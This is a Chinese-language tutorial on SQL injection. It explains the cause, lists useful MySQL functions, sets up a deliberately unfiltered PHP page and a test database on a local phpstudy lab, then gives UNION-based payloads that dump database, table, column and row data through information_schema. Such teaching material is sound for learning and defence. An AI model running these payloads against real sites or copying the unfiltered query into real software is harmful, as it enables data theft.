一
1.注入原理
sql注入漏洞產生的原理是因為服務器對用戶輸入參數過濾不嚴格,將含有惡意代碼的參數代入數據庫查詢語句中并執行。
2.sql注入中常用的函數與語法
將select的查詢結果全部顯示出來,占一個顯示位
Group_concat():
查詢MySQL版本
select version():
查詢數據庫用戶名
select user():
查詢數據庫名
select database():
查詢數據庫的絕對路徑
select @@datadir():
select @@version_compile_os:查詢操作系統版本
select current_user():查詢當前用戶
Order by: 找列的數量
Union select:聯合查詢(聯合查詢的條件是前一條語句查詢不到且字段數與前一條語句的查詢字段數一致)
limit:限制顯示個數(如:limit 0 2 表示從第一個開始顯示兩個)
3.注入實例
環境:win7+phpstudy
部分代碼實現(文件保存為sql.php)
<?php
error_reporting(0);
$id = $_GET['id'];
$con = mysql_connect('localhost','root','root');
if(!$con){
die('mysql connect failed');
}
mysql_select_db('test',$con) or die('failed to connect db');
$sql = "SELECT * FROM users WHERE id='{$id}'";
$result = mysql_query($sql);
if ($row = mysql_fetch_array($result)) {
echo "
姓名:$row[1] 綽號:$row[2]
";
}else{
echo mysql_error();
}
mysql_close($con);
?>
數據庫代碼
create database test; //創建數據庫test
create table users(id int,name varchar(10),nicheng varchar(15)); //創建users表
insert into users values(1,'haha','haha');
insert into users values(2,'xixi','xixi'); //插入數據
- 開phpstudy,訪問sql.php
- 輸入正確的ID,能夠查詢出數據
- 檢測是否存在注入
數字型:and 1=1;and 1=2 判斷是否存在注入 字符型:' and '1'='1 ' and '1'='2 搜索型: 關鍵字%' and 1=1 and '%'='% ; 關鍵字%' and 1=2 and '%'='%
- 通過源代碼我們可以知道這里對傳入的ID沒有做任何過濾所以可以開始構造惡意語句
?id=1' order by 3 --+ //判斷字段數
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
或
?id=-1' union select 1,(select schema_name from information_schema.schemata limit 0,1),3 --+ //爆庫
?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='數據庫名' limit 0,1),3 --+ //爆表
?id=-1' union select 1,(select column_name from information_schema.columns where table_schema='數據庫名' and table_name='表名' limit 0,1),3 --+ //爆字段
?id=-1' union select 1,(select 字段 from 數據庫.表 limit 0,1),3 --+ //爆數據
